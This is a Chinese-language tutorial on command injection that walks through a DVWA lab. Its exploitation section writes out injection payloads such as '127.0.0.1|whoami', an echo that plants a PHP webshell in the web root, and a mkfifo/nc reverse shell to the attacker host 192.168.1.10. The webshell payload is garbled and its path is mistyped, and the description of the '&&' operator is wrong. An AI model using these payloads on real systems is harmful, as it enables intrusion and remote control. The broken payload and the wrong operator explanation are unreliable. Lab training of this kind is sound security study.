安全漏洞从原理到实战--命令执行漏洞

01 命令执行漏洞
即黑客可以通过控制参数执行系统命令,形成原因是开发人员对用户输入参数安全检查不足从而导致的恶意命令执行。

02 常见的系统命令执行函数
Php命令执行函数eval()函数、assert()、preg_replace()、call_user_func()等。Java命令执行函数exec()函数等。

03 实战

  目标

        Ubuntu16.04

        DVWA系统

        IP:192.168.1.5

   攻击

       Kali Linux2020.2

       IP:192.168.1.10
   a、功能分析
       提示信息输入IP地址

安全漏洞从原理到实战--命令执行漏洞_第1张图片
输入IP地址,通过页面返回信息得知该功能是执行ping命令
安全漏洞从原理到实战--命令执行漏洞_第2张图片
b、漏洞分析
可能存在命令注入漏洞,构造参数如127.0.0.1|whoami
安全漏洞从原理到实战--命令执行漏洞_第3张图片
发现返回www-data、说明存在命令执行漏洞,且系统应该是Linux系统。使用127.0.0.1|uname验证系统。
安全漏洞从原理到实战--命令执行漏洞_第4张图片
返回系统是Linux系统,如果不返回任何信息说明是Windows系统。
&:除了最后一个cmd,前面的cmd均已后台方式静默执行,执行结果显示在终端上,个别的cmd错误不影响整个命令的执行,全部的cmd同时执行。
**&&:**从左到右顺序执行cmd,个别cmd错误不产生影响。
**|:**各个cmd同时在前台被执行,但是除最后的cmd之外,其余的执行结果不会被显示在终端上。
**||:**从左到右顺序执行cmd,只有左侧的cmd执行出错,右边的cmd才会被执行,同时一旦有cmd被成功执行,整个命令就会结束,返回终端。
漏洞利用
1、写入webshell
查看文件

127.0.0.1|ls /var/www/html/dvwa

安全漏洞从原理到实战--命令执行漏洞_第5张图片

127.0.0.1|echo "$_POST['123456'];?>">/var/ww/html/dvwa/1.php

安全漏洞从原理到实战--命令执行漏洞_第6张图片
写入成功
2、反弹shell

127.0.0.1|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.10 4444 >/tmp/f

安全漏洞从原理到实战--命令执行漏洞_第7张图片

你可能感兴趣的:(渗透测试)